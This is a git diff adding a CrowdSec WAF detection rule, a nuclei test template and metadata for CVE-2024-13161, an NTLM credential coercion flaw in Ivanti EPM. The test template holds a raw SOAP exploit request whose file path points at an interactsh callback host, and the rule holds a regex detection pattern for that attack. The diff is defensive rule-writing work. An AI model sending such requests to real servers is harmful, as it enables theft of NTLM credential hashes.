diff --git a/.appsec-tests/CVE-2024-13161/CVE-2024-13161.yaml b/.appsec-tests/CVE-2024-13161/CVE-2024-13161.yaml
new file mode 100644
index 00000000000..c348f171bb0
--- /dev/null
+++ b/.appsec-tests/CVE-2024-13161/CVE-2024-13161.yaml
@@ -0,0 +1,30 @@
+## autogenerated on 2025-03-13 18:21:48
+id: CVE-2024-13161
+info:
+ name: CVE-2024-13161
+ author: crowdsec
+ severity: info
+ description: CVE-2024-13161 testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: text/xml
+ Soapaction: http://tempuri.org/GetHashForSingleFile
+
+
+
+
+
+ \\{{interactsh-url}}\tmp\{{file}}.txt
+
+
+
+ cookie-reuse: true
+ matchers:
+ - type: status
+ status:
+ - 403
\ No newline at end of file
diff --git a/.appsec-tests/CVE-2024-13161/config.yaml b/.appsec-tests/CVE-2024-13161/config.yaml
new file mode 100644
index 00000000000..ea4329dc9e6
--- /dev/null
+++ b/.appsec-tests/CVE-2024-13161/config.yaml
@@ -0,0 +1,4 @@
+## autogenerated on 2025-03-13 18:21:48
+appsec-rules:
+ - ./appsec-rules/crowdsecurity/CVE-2024-13161.yaml
+nuclei_template: CVE-2024-13161.yaml
\ No newline at end of file
diff --git a/.index.json b/.index.json
index 8647303e101..7f0c6f4f6b0 100644
--- a/.index.json
+++ b/.index.json
@@ -82,6 +82,32 @@
}
},
"appsec-rules": {
+ "crowdsecurity/CVE-2024-13161": {
+ "path": "appsec-rules/crowdsecurity/CVE-2024-13161.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "e0e0fef36d175cd395b7e7949db765a9dbedd432b8f82235fbd5b2df2ea5353c",
+ "deprecated": false
+ }
+ },
+ "content": "IyMgYXV0b2dlbmVyYXRlZCBvbiAyMDI1LTAzLTEzIDE4OjIxOjQ4Cm5hbWU6IGNyb3dkc2VjdXJpdHkvQ1ZFLTIwMjQtMTMxNjEKZGVzY3JpcHRpb246ICdEZXRlY3RzIE5UTE0gY3JlZGVudGlhbCBjb2VyY2lvbiB2aWEgdGhlIEdldEhhc2hGb3JTaW5nbGVGaWxlIGVuZHBvaW50IGluIEl2YW50aSBFUE0nCnJ1bGVzOgogIC0gYW5kOgogICAgICAtIHpvbmVzOgogICAgICAgICAgLSBVUkkKICAgICAgICB0cmFuc2Zvcm06CiAgICAgICAgICAtIGxvd2VyY2FzZQogICAgICAgIG1hdGNoOgogICAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgICB2YWx1ZTogL3dzdnVsbmVyYWJpbGl0eWNvcmUvdnVsY29yZS5hc214CiAgICAgIC0gem9uZXM6CiAgICAgICAgICAtIEJPRFkKICAgICAgICB0cmFuc2Zvcm06CiAgICAgICAgICAtIGxvd2VyY2FzZQogICAgICAgIG1hdGNoOgogICAgICAgICAgdHlwZTogcmVnZXgKICAgICAgICAgIHZhbHVlOiAnPHdpbGRjYXJkPlxcXFwuKlxcdG1wXFwuKlwudHh0PFwvd2lsZGNhcmQ+JwpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICdodHRwOmV4cGxvaXQnCiAgbGFiZWw6ICdJdmFudGkgRVBNIENyZWRlbnRpYWwgQ29lcmNpb24nCiAgY2xhc3NpZmljYXRpb246CiAgICAtIGN2ZS5DVkUtMjAyNC0xMzE2MQogICAgLSBhdHRhY2suVDEyMTAKICAgIC0gY3dlLkNXRS0zNg==",
+ "description": "Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2024-13161",
+ "attack.T1210",
+ "cwe.CWE-36"
+ ],
+ "confidence": 3,
+ "label": "Ivanti EPM Credential Coercion",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
"crowdsecurity/base-config": {
"path": "appsec-rules/crowdsecurity/base-config.yaml",
"version": "0.1",
diff --git a/appsec-rules/crowdsecurity/CVE-2024-13161.yaml b/appsec-rules/crowdsecurity/CVE-2024-13161.yaml
new file mode 100644
index 00000000000..f2bf3d85940
--- /dev/null
+++ b/appsec-rules/crowdsecurity/CVE-2024-13161.yaml
@@ -0,0 +1,30 @@
+## autogenerated on 2025-03-13 18:21:48
+name: crowdsecurity/CVE-2024-13161
+description: 'Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM'
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: /wsvulnerabilitycore/vulcore.asmx
+ - zones:
+ - BODY
+ transform:
+ - lowercase
+ match:
+ type: regex
+ value: '\\\\.*\\tmp\\.*\.txt<\/wildcard>'
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: 'http:exploit'
+ label: 'Ivanti EPM Credential Coercion'
+ classification:
+ - cve.CVE-2024-13161
+ - attack.T1210
+ - cwe.CWE-36
\ No newline at end of file
diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml
index 3f4745dfd60..302eea1214d 100644
--- a/collections/crowdsecurity/appsec-virtual-patching.yaml
+++ b/collections/crowdsecurity/appsec-virtual-patching.yaml
@@ -81,6 +81,7 @@ appsec-rules:
- crowdsecurity/vpatch-CVE-2024-51378
- crowdsecurity/vpatch-CVE-2024-41713
- crowdsecurity/vpatch-CVE-2024-6205
+- crowdsecurity/CVE-2024-13161.yaml
author: crowdsecurity
contexts:
- crowdsecurity/appsec_base
diff --git a/taxonomy/scenarios.json b/taxonomy/scenarios.json
index 382b3b0f7e5..ab9f03d8d4e 100644
--- a/taxonomy/scenarios.json
+++ b/taxonomy/scenarios.json
@@ -1,4 +1,26 @@
{
+ "crowdsecurity/CVE-2024-13161": {
+ "name": "crowdsecurity/CVE-2024-13161",
+ "description": "Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM",
+ "label": "Ivanti EPM Credential Coercion",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0008:T1210"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "created_at": "2025-03-13 18:21:51",
+ "cves": [
+ "CVE-2024-13161"
+ ],
+ "cwes": [
+ "CWE-36"
+ ]
+ },
"crowdsecurity/generic-freemarker-ssti": {
"name": "crowdsecurity/generic-freemarker-ssti",
"description": "Generic FreeMarker SSTI",